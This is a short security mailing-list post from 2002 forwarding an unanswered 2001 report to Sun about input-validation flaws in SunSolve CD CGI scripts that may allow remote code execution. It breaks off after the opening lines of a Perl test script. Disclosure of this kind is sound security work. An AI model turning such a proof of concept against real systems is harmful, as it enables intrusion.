SunSolve CD cgi scripts...

From: Fyodor (fyarochkinat_private)
Date: Sun Mar 10 2002 - 21:46:06 PST

    Sun never responded to this mail so I guess they don't consider the bug
    too be serious ... could be worth mentioning though.

    ----- Forwarded message from Fyodor <fyodorat_private> -----
    Date: Sat, 16 Jun 2001 23:24:45 +0700
    From: Fyodor <fyodorat_private>
    To: security-alertat_private
    Subject: SunSolve CD security problems..

    Hey folks, while playing with Sunsolve CD cgi scripts we found quite a
    few user input validation problems which may pose security risks (remote
    code execution).  Here's a perl script to test it quickly:

    #!/usr/bin/perl
    use LWP::UserAgent;
    use HTTP::Request::Common qw(POST);
    ua = new LWP::UserAgent;